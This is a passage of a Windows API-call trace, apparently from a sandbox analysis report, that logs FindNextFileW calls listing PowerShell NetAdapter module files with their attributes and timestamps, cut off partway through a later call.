dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.240] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3925, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.240] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e57, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.241] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x260e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.241] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.241] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2fb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.cdxml", cAlternateFileName="")) returned 1 [0177.241] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.241] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2418, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.cdxml", cAlternateFileName="")) returned 1 [0177.242] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.242] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.242] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.242] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x245a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.cdxml", cAlternateFileName="")) returned 1 [0177.242] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.243] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2432, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.cdxml", cAlternateFileName="")) returned 1 [0177.243] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1748, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.243] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e61, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPacketDirect.cdxml", cAlternateFileName="")) returned 1 [0177.243] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c25, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPacketDirect.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.243] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4100, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.244] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcea, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.244] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e50, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.244] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2005, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.cdxml", cAlternateFileName="")) returned 1 [0177.244] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x148f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.245] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.245] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRdma.cdxml", cAlternateFileName="")) returned 1 [0177.245] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRdma.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.246] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c691a7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c691a7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a70, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRsc.cdxml", cAlternateFileName="")) returned 1 [0177.246] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRsc.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.246] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x27d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRss.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.246] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1808, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRss.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.246] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2701, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriov.cdxml", cAlternateFileName="")) returned 1 [0177.246] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe42, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriov.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.247] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriovVf.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.247] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriovVf.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.247] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterStatistics.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.247] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterStatistics.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.248] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2319, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmq.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.248] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb51, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmq.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.248] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmqQueue.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.248] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe06, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmqQueue.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.248] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9df, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVPort.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.248] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVPort.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.249] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc82, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.249] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.psd1", cAlternateFileName="")) returned 1 [0177.249] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb225, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.249] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb225, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Types.ps1xml", cAlternateFileName="")) returned 0 [0177.249] FindClose (in: hFindFile=0x1a592850 | out: hFindFile=0x1a592850) returned 1 [0177.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.250] GetFullPathNameW (in: 